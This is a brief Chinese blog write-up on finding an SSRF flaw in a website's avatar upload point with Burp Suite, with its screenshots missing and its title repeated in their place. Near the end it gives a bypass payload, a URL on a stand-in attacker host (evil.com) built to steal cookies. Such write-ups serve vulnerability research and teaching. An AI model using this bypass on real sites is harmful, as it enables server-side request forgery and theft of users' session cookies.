记一次偶然的SSRF漏洞挖掘与测试

 心得:去挖一个漏洞直接利用burpsuite抓包 然后一步一步过 看参数的具体含义 在可能出现漏洞的点重点去分析 测试;本次SSRF漏洞就是我在挖文件上传漏洞时一不小心测到的。

找到一个头像上传点,本来打算先上传一个正常的图片抓包看看 结果无意中发现它将img的存储路径直接爆了出来 这时想到SSRF 就是在调用内网资源的时候会发送 就开始进行测试

 记一次偶然的SSRF漏洞挖掘与测试

记一次偶然的SSRF漏洞挖掘与测试

 

发包到repeater模块后返回正常信息 ,这里的测试我先将原路径下的所有地址全部替换,发现报错

记一次偶然的SSRF漏洞挖掘与测试

这里的测试我先将原路径下的所有地址全部替换,发现报错

记一次偶然的SSRF漏洞挖掘与测试

记一次偶然的SSRF漏洞挖掘与测试

那就还原后一个一个测试,控制变量法发现最终匹配的字符串如下,猜测后端完全匹配该字符串

记一次偶然的SSRF漏洞挖掘与测试

将该字符串保留,结合url跳转漏洞的绕过方式进行绕过 利用平台生成盗取cookie的URL 具体url为 http://evil.com?/data/upload/user/

 

上一篇:从0到1CTFer成长之路-第二章-SSRF漏洞


下一篇:ctfshow-web入门-ssrf-351--360